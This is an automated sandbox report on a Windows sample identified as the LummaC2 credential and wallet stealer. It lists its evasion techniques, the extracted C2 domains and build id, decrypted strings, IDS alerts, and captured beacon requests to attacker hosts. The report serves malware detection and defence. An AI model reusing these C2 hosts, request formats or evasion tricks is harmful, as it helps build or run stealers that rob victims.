Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1532742
MD5:395a5c7fa6131d1a2ce4689ce9202399
SHA1:ea3dab42eced8cf068bd69ecc568a5bd2b1dfcf8
SHA256:14025c4c8400e3712ad13e69eeab48d32405795852013ae29c1cf8a25ce0169f
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • file.exe (PID: 4836 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 395A5C7FA6131D1A2CE4689CE9202399)
    • WerFault.exe (PID: 2172 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 1112 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["bathdoomgaz.store", "dissapoiznw.store", "clearancek.site", "studennotediw.store", "mobbipenju.store", "licendfilteo.site", "spirittunek.store", "eaglepawnoy.store"], "Build id": "4SD0y4--legendaryy"}
SourceRuleDescriptionAuthorStrings
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
    No Sigma rule has matched
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T21:04:13.139509+020020546531A Network Trojan was detected192.168.2.749700104.21.53.8443TCP
    2024-10-13T21:04:14.199999+020020546531A Network Trojan was detected192.168.2.749701104.21.53.8443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T21:04:13.139509+020020498361A Network Trojan was detected192.168.2.749700104.21.53.8443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T21:04:14.199999+020020498121A Network Trojan was detected192.168.2.749701104.21.53.8443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T21:04:10.544433+020020564771Domain Observed Used for C2 Detected192.168.2.7533301.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T21:04:10.479175+020020564711Domain Observed Used for C2 Detected192.168.2.7509071.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T21:04:10.519277+020020564811Domain Observed Used for C2 Detected192.168.2.7525331.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T21:04:10.504974+020020564831Domain Observed Used for C2 Detected192.168.2.7618561.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T21:04:10.567382+020020564731Domain Observed Used for C2 Detected192.168.2.7554001.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T21:04:10.492379+020020564851Domain Observed Used for C2 Detected192.168.2.7523791.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T21:04:10.555186+020020564751Domain Observed Used for C2 Detected192.168.2.7651601.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T21:04:10.533094+020020564791Domain Observed Used for C2 Detected192.168.2.7599151.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T21:04:12.358303+020028586661Domain Observed Used for C2 Detected192.168.2.749699104.102.49.254443TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: file.exeAvira: detected
    Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
    Source: file.exe.4836.1.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["bathdoomgaz.store", "dissapoiznw.store", "clearancek.site", "studennotediw.store", "mobbipenju.store", "licendfilteo.site", "spirittunek.store", "eaglepawnoy.store"], "Build id": "4SD0y4--legendaryy"}
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: file.exeJoe Sandbox ML: detected
    Source: 00000001.00000002.1593838449.0000000000881000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000001.00000002.1593838449.0000000000881000.00000040.00000001.01000000.00000003.sdmpString decryptor: licendfilteo.site
    Source: 00000001.00000002.1593838449.0000000000881000.00000040.00000001.01000000.00000003.sdmpString decryptor: spirittunek.store
    Source: 00000001.00000002.1593838449.0000000000881000.00000040.00000001.01000000.00000003.sdmpString decryptor: bathdoomgaz.store
    Source: 00000001.00000002.1593838449.0000000000881000.00000040.00000001.01000000.00000003.sdmpString decryptor: studennotediw.store
    Source: 00000001.00000002.1593838449.0000000000881000.00000040.00000001.01000000.00000003.sdmpString decryptor: dissapoiznw.store
    Source: 00000001.00000002.1593838449.0000000000881000.00000040.00000001.01000000.00000003.sdmpString decryptor: eaglepawnoy.store
    Source: 00000001.00000002.1593838449.0000000000881000.00000040.00000001.01000000.00000003.sdmpString decryptor: mobbipenju.store
    Source: 00000001.00000002.1593838449.0000000000881000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000001.00000002.1593838449.0000000000881000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000001.00000002.1593838449.0000000000881000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
    Source: 00000001.00000002.1593838449.0000000000881000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
    Source: 00000001.00000002.1593838449.0000000000881000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
    Source: 00000001.00000002.1593838449.0000000000881000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
    Source: 00000001.00000002.1593838449.0000000000881000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49699 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49700 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49701 version: TLS 1.2

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.7:52379 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.7:52533 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.7:61856 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.7:53330 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.7:50907 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.7:65160 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.7:59915 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.7:55400 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.7:49699 -> 104.102.49.254:443
    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49701 -> 104.21.53.8:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49701 -> 104.21.53.8:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49700 -> 104.21.53.8:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 104.21.53.8:443
    Source: Malware configuration extractorURLs: bathdoomgaz.store
    Source: Malware configuration extractorURLs: dissapoiznw.store
    Source: Malware configuration extractorURLs: clearancek.site
    Source: Malware configuration extractorURLs: studennotediw.store
    Source: Malware configuration extractorURLs: mobbipenju.store
    Source: Malware configuration extractorURLs: licendfilteo.site
    Source: Malware configuration extractorURLs: spirittunek.store
    Source: Malware configuration extractorURLs: eaglepawnoy.store
    Source: Joe Sandbox ViewIP Address: 104.21.53.8 104.21.53.8
    Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=gMs.8iLbDkUvWsm4DLZbAmUFo5QbmHUkuLow6nV_yck-1728846253-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: sergei-esenin.com
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1594572320.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://play equals www.youtube.com (Youtube)
    Source: global trafficDNS traffic detected: DNS query: clearancek.site
    Source: global trafficDNS traffic detected: DNS query: mobbipenju.store
    Source: global trafficDNS traffic detected: DNS query: eaglepawnoy.store
    Source: global trafficDNS traffic detected: DNS query: dissapoiznw.store
    Source: global trafficDNS traffic detected: DNS query: studennotediw.store
    Source: global trafficDNS traffic detected: DNS query: bathdoomgaz.store
    Source: global trafficDNS traffic detected: DNS query: spirittunek.store
    Source: global trafficDNS traffic detected: DNS query: licendfilteo.site
    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: sergei-esenin.com
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: Amcache.hve.12.drString found in binary or memory: http://upx.sf.net
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
    Source: file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstaticS3
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1594572320.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1594572320.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
    Source: file.exe, 00000001.00000003.1301918029.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1594572320.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301918029.0000000000F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e
    Source: file.exe, 00000001.00000003.1295478931.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1295478931.0000000000FB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
    Source: file.exe, 00000001.00000003.1301899607.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
